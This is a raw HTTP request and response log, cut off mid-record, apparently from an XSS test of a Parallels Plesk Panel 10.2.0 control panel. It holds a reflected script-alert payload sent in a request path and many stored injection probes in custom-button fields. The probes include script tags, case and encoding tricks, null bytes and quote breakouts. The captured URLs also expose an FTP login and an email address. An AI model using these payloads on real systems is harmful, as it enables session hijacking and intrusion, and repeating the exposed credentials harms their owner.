handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted%2527%2527;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:34:02 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:34:02 GMT
Connection: close
Content-Length: 111539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Fscript%253E' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"%0066f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27%253ca%253e3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"fdf080d9513e20f46babcaf7","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"47a92%2522%253baa99fdd1270?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-69915200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e27d6%2522%253b9ddf3b95647?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-6a0856c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3d5a5%2522%252dalert%25281%2529%252d%25225ca54b544?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-77ac57e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4d8c7%2522%252dalert%25281%2529%252d%25221949039db7c?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-78d38260-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"614b3%255c%2522%253be210f06fb27?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8205b240-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4f900%255c%2522%253b6cc1851587?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-839cbd60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-896a1760-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8b4167a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c%253c%252fscript%253e92757840c8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8d69a6a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f%253c%252fscript%253ee4b7ce199c3?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8f4a7c60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%009f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-91112300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-935f7800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-947abba0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-96bd29c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12%253c%252fScRiPt%2520%253e2e0a3728b8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-982bbd80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5%253c%252fScRiPt%2520%253e05c4f3b01c2?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9a708d00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9bd0d880-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9e075fc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"13e85%2527%253b2fac11d343e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-a326f560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2f63%2527%252dalert%25281%2529%252d%25278e70213d4f4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab68ba60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c75a4%255c%2527%253b6186c64b550?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b1b90000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b5843100-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463%253c%252fscript%253e490b561a81?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b75b8140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b93eb860-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 